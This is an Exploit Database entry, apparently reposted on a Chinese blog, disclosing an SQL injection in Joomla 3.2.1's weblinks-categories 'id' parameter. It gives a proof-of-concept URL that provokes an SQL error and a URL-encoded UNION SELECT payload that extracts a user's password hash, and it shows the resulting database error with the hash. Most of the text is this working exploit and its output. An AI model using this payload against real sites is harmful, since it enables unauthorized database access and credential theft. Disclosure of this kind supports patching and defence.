Joomla! 3.2.1 – SQL Injection

Exploit Database
123 阅读

作者： killall-9

日期： 2014-02-06
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/31459/

# Exploit Title: Joomla 3.2.1 sql injection

# Date: 05/02/2014

# Exploit Author: kiall-9@mail.com

# Vendor Homepage: http://www.joomla.org/

# Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip

# Version: 3.2.1 (default installation with Test sample data)

# Tested on: Virtualbox (debian) + apache

POC=>

http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=\

will cause an error:

1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\)' at line 3 SQL=SELECT <code>t</code>.<code>id</code> FROM <code>k59cv_tags</code> AS t INNER JOIN <code>k59cv_contentitem_tag_map</code> AS m ON <code>m</code>.<code>tag_id</code> = <code>t</code>.<code>id</code> AND <code>m</code>.<code>type_alias</code> = 'com_weblinks.categories' AND <code>m</code>.<code>content_item_id</code> IN ( \) Array ( [type] => 8 [message] => Undefined offset: 0 [file] => /var/www/Joomla_3.2.1/libraries/joomla/filter/input.php [line] => 203 )

I modified the original error.php file with this code --- <?php print_r(error_get_last()); ?> --- in order to obtain something useful. ;-)

Now i can easily exploit this flaw:

http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=0%20%29%20union%20select%20password%20from%20%60k59cv_users%60%20--%20%29

and obtain the hash:

1054 Unknown column '$P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause' SQL=SELECT <code>m</code>.<code>tag_id</code>,<code>m</code>.<code>core_content_id</code>,<code>m</code>.<code>content_item_id</code>,<code>m</code>.<code>type_alias</code>,COUNT( <code>tag_id</code>) AS <code>count</code>,<code>t</code>.<code>access</code>,<code>t</code>.<code>id</code>,<code>ct</code>.<code>router</code>,<code>cc</code>.<code>core_title</code>,<code>cc</code>.<code>core_alias</code>,<code>cc</code>.<code>core_catid</code>,<code>cc</code>.<code>core_language</code> FROM <code>k59cv_contentitem_tag_map</code> AS <code>m</code> INNER JOIN <code>k59cv_tags</code> AS <code>t</code> ON m.tag_id = t.id INNER JOIN <code>k59cv_ucm_content</code> AS <code>cc</code> ON m.core_content_id = cc.core_content_id INNER JOIN <code>k59cv_content_types</code> AS <code>ct</code> ON m.type_alias = ct.type_alias WHERE <code>m</code>.<code>tag_id</code> IN ($P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t.access IN (1,1) AND (<code>m</code>.<code>content_item_id</code> <> 0 ) union select password from <code>k59cv_users</code> -- ) OR <code>m</code>.<code>type_alias</code> <> 'com_weblinks.categories') AND <code>cc</code>.<code>core_state</code> = 1 GROUP BY <code>m</code>.<code>core_content_id</code> ORDER BY <code>count</code> DESC LIMIT 0, 5

CheerZ>